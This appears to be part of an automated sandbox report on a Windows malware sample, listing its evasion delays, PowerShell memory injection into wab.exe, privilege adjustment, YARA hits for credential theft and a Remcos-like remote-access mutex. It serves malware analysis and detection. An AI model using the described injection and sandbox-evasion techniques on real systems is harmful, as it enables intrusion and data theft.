Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6645
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 6181
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Evaded block: after key decision
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5064 Thread sleep count: 3490 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep count: 31 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep time: -93000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep count: 6181 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep time: -18543000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3490 delay: -5
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040673F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004065F5 FindFirstFileW,FindClose, 0_2_004065F5
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXM
Source: wab.exe, 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04627801 LdrInitializeThunk, 1_2_04627801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFAC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7

Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

Remote Access Functionality

Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR